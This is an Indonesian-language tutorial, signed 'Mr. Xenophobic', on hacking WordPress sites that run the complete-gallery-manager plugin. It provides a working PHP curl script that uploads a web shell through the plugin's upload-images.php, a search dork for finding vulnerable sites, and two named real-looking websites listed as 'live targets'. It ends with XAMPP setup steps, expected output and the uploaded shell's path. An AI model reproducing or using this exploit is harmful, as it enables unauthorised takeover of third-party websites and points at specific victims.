Mr. Xenophobic

Bismillahirrahmanirrahim,

oke, pertama² kalian harus download dan install xampp ~> Tutorial & Link Download Xampp

yang kedua, kalian membutuhkan exploitnya :

<?php

$uploadfile="namashellkalian.php";

$ch = curl_init("http://target.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");

curl_setopt($ch, CURLOPT_POST, true);  

curl_setopt($ch, CURLOPT_POSTFIELDS,

        array('qqfile'=>"@$uploadfile"));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";

 

?>

 untuk Dork :

inurl:/wp-content/plugins/complete-gallery-manager/

live target :

http://primewebconsulting.com/
http://www.alpinegranite.com/

start xampp, dan klik Svc      [Apache] ~> Start ~> Admin


nanti akan muncul sebuah tab browser, jngn ditutup, buka tab browser tersebut, klik bahasa yang kalian inginkan.


klik start ~> Run ~> ketik "Cmd"
nanti akan muncul Command Prompt
ketik "cd \"
terus ketik "xampp/php"

oh iya, save file exploit & shell kalian di folder C:\Xampp\php\

setelah disave di folder php, kalian cari file php.ini :


buka file tersebut, lalu pencet ctrl+f dan ketik "curl" lalu klik Find Next. :


nanti akan muncul text seperti ini ";extension=php_curl.dll"

hapus tanda ";" disamping "extension=" lalu klik save.

disini saya anggap kalian sudah mengedit script exploitnya, sekarang kembali ke cmd dan ketik "php fileexploitnya.php" dan pencet enter.


nanti akan muncul text seperti ini :

{"success":true,"r_data":[{"name":"Full Size","url":"http:\/\/target
.com\/wp-content\/uploads\/2013\/10\/xeno-x.php","filename":"xeno","width":null,
"height":null}]}
C:\xampp\php>

bila tidak muncul text seperti itu, berarti website tersebut tidak vuln.

tempat shell yang terupload :

http://target.com/wp-content/uploads/2013/10/shell.php